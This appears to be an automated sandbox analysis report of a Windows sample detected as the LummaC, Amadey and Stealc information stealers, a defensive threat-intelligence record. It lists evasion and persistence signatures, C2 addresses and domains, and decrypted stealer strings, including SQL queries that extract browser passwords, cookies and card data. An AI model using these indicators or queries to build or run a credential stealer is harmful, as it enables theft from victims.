Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545302
MD5: de54690c9f171f91b13960453ab60fd3
SHA1: 670b2988eca93c82e2639960fd638ee5d56f34d6
SHA256: 51961e496e66b300950023c9aba682a5232ade37926db00f10e58df4f46eb1cd
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

barindex
Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0000000D.00000003.1584824472.0000000004C20000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 39.0.num.exe.e60000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 42.0.test.exe.e90000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["dilemmadu.site", "servicedny.site", "contemteny.site", "seallysl.site", "goalyfeastz.site", "opposezmny.site", "faulteyotk.site", "authorisev.site"], "Build id": "2Zo0RN--PRIVATE"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\test[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1002600001\test.exe ReversingLabs: Detection: 44%
Source: file.exe ReversingLabs: Detection: 39%
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Q5PCC4NA5LRKC8PQDTEQRA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002600001\test.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\test[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 39.0.num.exe.e60000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 39.0.num.exe.e60000.0.unpack String decryptor: 30
Source: 39.0.num.exe.e60000.0.unpack String decryptor: 11
Source: 39.0.num.exe.e60000.0.unpack String decryptor: 20
Source: 39.0.num.exe.e60000.0.unpack String decryptor: 24
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetProcAddress
Source: 39.0.num.exe.e60000.0.unpack String decryptor: LoadLibraryA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: lstrcatA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: OpenEventA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CreateEventA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CloseHandle
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Sleep
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetUserDefaultLangID
Source: 39.0.num.exe.e60000.0.unpack String decryptor: VirtualAllocExNuma
Source: 39.0.num.exe.e60000.0.unpack String decryptor: VirtualFree
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetSystemInfo
Source: 39.0.num.exe.e60000.0.unpack String decryptor: VirtualAlloc
Source: 39.0.num.exe.e60000.0.unpack String decryptor: HeapAlloc
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetComputerNameA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: lstrcpyA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetProcessHeap
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetCurrentProcess
Source: 39.0.num.exe.e60000.0.unpack String decryptor: lstrlenA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ExitProcess
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetSystemTime
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SystemTimeToFileTime
Source: 39.0.num.exe.e60000.0.unpack String decryptor: advapi32.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: gdi32.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: user32.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: crypt32.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ntdll.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetUserNameA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CreateDCA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetDeviceCaps
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ReleaseDC
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CryptStringToBinaryA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sscanf
Source: 39.0.num.exe.e60000.0.unpack String decryptor: VMwareVMware
Source: 39.0.num.exe.e60000.0.unpack String decryptor: HAL9TH
Source: 39.0.num.exe.e60000.0.unpack String decryptor: JohnDoe
Source: 39.0.num.exe.e60000.0.unpack String decryptor: DISPLAY
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %hu/%hu/%hu
Source: 39.0.num.exe.e60000.0.unpack String decryptor: http://185.215.113.206
Source: 39.0.num.exe.e60000.0.unpack String decryptor: bksvnsj
Source: 39.0.num.exe.e60000.0.unpack String decryptor: /6c4adf523b719729.php
Source: 39.0.num.exe.e60000.0.unpack String decryptor: /746f34465cf17784/
Source: 39.0.num.exe.e60000.0.unpack String decryptor: tale
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetFileAttributesA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GlobalLock
Source: 39.0.num.exe.e60000.0.unpack String decryptor: HeapFree
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetFileSize
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GlobalSize
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 39.0.num.exe.e60000.0.unpack String decryptor: IsWow64Process
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Process32Next
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetLocalTime
Source: 39.0.num.exe.e60000.0.unpack String decryptor: FreeLibrary
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetTimeZoneInformation
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetSystemPowerStatus
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetVolumeInformationA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Process32First
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetLocaleInfoA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetModuleFileNameA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: DeleteFileA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: FindNextFileA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: LocalFree
Source: 39.0.num.exe.e60000.0.unpack String decryptor: FindClose
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: LocalAlloc
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetFileSizeEx
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ReadFile
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SetFilePointer
Source: 39.0.num.exe.e60000.0.unpack String decryptor: WriteFile
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CreateFileA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: FindFirstFileA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CopyFileA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: VirtualProtect
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetLastError
Source: 39.0.num.exe.e60000.0.unpack String decryptor: lstrcpynA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: MultiByteToWideChar
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GlobalFree
Source: 39.0.num.exe.e60000.0.unpack String decryptor: WideCharToMultiByte
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GlobalAlloc
Source: 39.0.num.exe.e60000.0.unpack String decryptor: OpenProcess
Source: 39.0.num.exe.e60000.0.unpack String decryptor: TerminateProcess
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetCurrentProcessId
Source: 39.0.num.exe.e60000.0.unpack String decryptor: gdiplus.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ole32.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: bcrypt.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: wininet.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: shlwapi.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: shell32.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: psapi.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: rstrtmgr.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SelectObject
Source: 39.0.num.exe.e60000.0.unpack String decryptor: BitBlt
Source: 39.0.num.exe.e60000.0.unpack String decryptor: DeleteObject
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CreateCompatibleDC
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GdipGetImageEncoders
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GdiplusStartup
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GdiplusShutdown
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GdipSaveImageToStream
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GdipDisposeImage
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GdipFree
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetHGlobalFromStream
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CoUninitialize
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CoInitialize
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CoCreateInstance
Source: 39.0.num.exe.e60000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 39.0.num.exe.e60000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 39.0.num.exe.e60000.0.unpack String decryptor: BCryptDecrypt
Source: 39.0.num.exe.e60000.0.unpack String decryptor: BCryptSetProperty
Source: 39.0.num.exe.e60000.0.unpack String decryptor: BCryptDestroyKey
Source: 39.0.num.exe.e60000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetWindowRect
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetDesktopWindow
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetDC
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CloseWindow
Source: 39.0.num.exe.e60000.0.unpack String decryptor: wsprintfA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CharToOemW
Source: 39.0.num.exe.e60000.0.unpack String decryptor: wsprintfW
Source: 39.0.num.exe.e60000.0.unpack String decryptor: RegQueryValueExA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: RegEnumKeyExA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: RegOpenKeyExA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: RegCloseKey
Source: 39.0.num.exe.e60000.0.unpack String decryptor: RegEnumValueA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CryptBinaryToStringA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CryptUnprotectData
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SHGetFolderPathA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ShellExecuteExA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: InternetOpenUrlA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: InternetConnectA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: InternetCloseHandle
Source: 39.0.num.exe.e60000.0.unpack String decryptor: InternetOpenA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: HttpSendRequestA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: HttpOpenRequestA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: InternetReadFile
Source: 39.0.num.exe.e60000.0.unpack String decryptor: InternetCrackUrlA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: StrCmpCA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: StrStrA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: StrCmpCW
Source: 39.0.num.exe.e60000.0.unpack String decryptor: PathMatchSpecA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: GetModuleFileNameExA
Source: 39.0.num.exe.e60000.0.unpack String decryptor: RmStartSession
Source: 39.0.num.exe.e60000.0.unpack String decryptor: RmRegisterResources
Source: 39.0.num.exe.e60000.0.unpack String decryptor: RmGetList
Source: 39.0.num.exe.e60000.0.unpack String decryptor: RmEndSession
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sqlite3_open
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sqlite3_step
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sqlite3_column_text
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sqlite3_finalize
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sqlite3_close
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sqlite3_column_bytes
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sqlite3_column_blob
Source: 39.0.num.exe.e60000.0.unpack String decryptor: encrypted_key
Source: 39.0.num.exe.e60000.0.unpack String decryptor: PATH
Source: 39.0.num.exe.e60000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: NSS_Init
Source: 39.0.num.exe.e60000.0.unpack String decryptor: NSS_Shutdown
Source: 39.0.num.exe.e60000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 39.0.num.exe.e60000.0.unpack String decryptor: PK11_FreeSlot
Source: 39.0.num.exe.e60000.0.unpack String decryptor: PK11_Authenticate
Source: 39.0.num.exe.e60000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 39.0.num.exe.e60000.0.unpack String decryptor: C:\ProgramData\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 39.0.num.exe.e60000.0.unpack String decryptor: browser:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: profile:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: url:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: login:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: password:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Opera
Source: 39.0.num.exe.e60000.0.unpack String decryptor: OperaGX
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Network
Source: 39.0.num.exe.e60000.0.unpack String decryptor: cookies
Source: 39.0.num.exe.e60000.0.unpack String decryptor: .txt
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 39.0.num.exe.e60000.0.unpack String decryptor: TRUE
Source: 39.0.num.exe.e60000.0.unpack String decryptor: FALSE
Source: 39.0.num.exe.e60000.0.unpack String decryptor: autofill
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 39.0.num.exe.e60000.0.unpack String decryptor: history
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 39.0.num.exe.e60000.0.unpack String decryptor: cc
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 39.0.num.exe.e60000.0.unpack String decryptor: name:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: month:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: year:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: card:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Cookies
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Login Data
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Web Data
Source: 39.0.num.exe.e60000.0.unpack String decryptor: History
Source: 39.0.num.exe.e60000.0.unpack String decryptor: logins.json
Source: 39.0.num.exe.e60000.0.unpack String decryptor: formSubmitURL
Source: 39.0.num.exe.e60000.0.unpack String decryptor: usernameField
Source: 39.0.num.exe.e60000.0.unpack String decryptor: encryptedUsername
Source: 39.0.num.exe.e60000.0.unpack String decryptor: encryptedPassword
Source: 39.0.num.exe.e60000.0.unpack String decryptor: guid
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 39.0.num.exe.e60000.0.unpack String decryptor: cookies.sqlite
Source: 39.0.num.exe.e60000.0.unpack String decryptor: formhistory.sqlite
Source: 39.0.num.exe.e60000.0.unpack String decryptor: places.sqlite
Source: 39.0.num.exe.e60000.0.unpack String decryptor: plugins
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Local Extension Settings
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Sync Extension Settings
Source: 39.0.num.exe.e60000.0.unpack String decryptor: IndexedDB
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Opera Stable
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Opera GX Stable
Source: 39.0.num.exe.e60000.0.unpack String decryptor: CURRENT
Source: 39.0.num.exe.e60000.0.unpack String decryptor: chrome-extension_
Source: 39.0.num.exe.e60000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Local State
Source: 39.0.num.exe.e60000.0.unpack String decryptor: profiles.ini
Source: 39.0.num.exe.e60000.0.unpack String decryptor: chrome
Source: 39.0.num.exe.e60000.0.unpack String decryptor: opera
Source: 39.0.num.exe.e60000.0.unpack String decryptor: firefox
Source: 39.0.num.exe.e60000.0.unpack String decryptor: wallets
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %08lX%04lX%lu
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ProductName
Source: 39.0.num.exe.e60000.0.unpack String decryptor: x32
Source: 39.0.num.exe.e60000.0.unpack String decryptor: x64
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 39.0.num.exe.e60000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ProcessorNameString
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 39.0.num.exe.e60000.0.unpack String decryptor: DisplayName
Source: 39.0.num.exe.e60000.0.unpack String decryptor: DisplayVersion
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Network Info:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - IP: IP?
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Country: ISO?
Source: 39.0.num.exe.e60000.0.unpack String decryptor: System Summary:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - HWID:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - OS:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Architecture:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - UserName:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Computer Name:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Local Time:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - UTC:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Language:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Keyboards:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Laptop:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Running Path:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - CPU:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Threads:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Cores:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - RAM:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - Display Resolution:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: - GPU:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: User Agents:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Installed Apps:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: All Users:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Current User:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Process List:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: system_info.txt
Source: 39.0.num.exe.e60000.0.unpack String decryptor: freebl3.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: mozglue.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: msvcp140.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: nss3.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: softokn3.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: vcruntime140.dll
